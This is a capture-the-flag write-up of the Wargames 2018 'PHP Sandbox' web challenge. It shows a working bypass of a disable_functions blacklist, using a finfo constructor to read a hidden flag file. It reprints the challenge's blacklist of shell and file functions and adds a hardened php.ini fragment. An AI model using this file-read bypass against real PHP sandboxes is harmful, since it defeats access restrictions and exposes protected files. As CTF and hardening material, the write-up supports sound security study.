Wargames 2018 – PHP Sandbox

Hi readers, during a CTF we (Shah and myself) took part in this year, we were given a web challenge called PHP Sandbox. The web application allows participants to run any PHP code they submit. While trying to create a web shell, we got an error stating that "the function was disabled". We then viewed the PHP configuration by executing the command below:

phpinfo();

Upon reading the phpinfo output, we noticed that quite a number of functions were disabled, as shown in the figure below:

phpinfo

Below is the list of disabled functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,shell_exec,proc_open,popen,system,passthru,file_get_contents,readfile,fopen,ini_set,fgets,include,include_once,require,require_once,fgetcsv,parse_ini_file,rename,copy,symlink,fseek,file,file_exists,delete,chmod,fpassthru,freed,fscanf,stream_wrapper_register,stream_wrapper_restore,fsockopen,pfsockopen,curl_init,stream_context_create,show_source,highlight_file,sleep,token_get_all,yaml_parse_file

While trying to figure out how we could read the flag, we tried listing the directory, as shown in the figure below:

Reading the directory

After some trial and error, we finally found a way to read the flag without using any of the disabled functions. The command below was used to read the flag:

new Finfo(0, '.supers3cr37file.php');

The figure below proves that we successfully read the flag:

Flag
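As an added note from the defender's side (not part of the original writeup): the bypass works because disable_functions only names functions, while new finfo() is a class constructor, and its second argument is the path of a magic database that libmagic opens and tries to parse. The php.ini fragment below, with assumed paths and an abbreviated blacklist, contrasts the challenge's function-only blacklist with a configuration that also closes the class and the procedural entry point:

```ini
; --- Weak: a function blacklist only, the approach the challenge used. ---
; The fileinfo class is not a function, so `new finfo(0, $path)` is never
; checked here and libmagic will still open $path as a "magic database".
disable_functions = exec,shell_exec,system,passthru,popen,proc_open,file_get_contents,readfile,fopen,file

; --- Hardened (assumed deployment; paths are placeholders) ---
; 1. Keep the blacklist, and also name the procedural twin of the constructor,
;    finfo_open(flags, magic_database), which takes the same path argument.
disable_functions = exec,shell_exec,system,passthru,popen,proc_open,file_get_contents,readfile,fopen,file,finfo_open
; 2. Block the class itself; this is the directive disable_functions cannot replace.
disable_classes = finfo
; 3. Defence in depth: restrict which paths PHP will open at all, so that a
;    primitive missing from the lists above still cannot reach the flag file.
open_basedir = /var/www/sandbox/public:/tmp/sandbox
```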
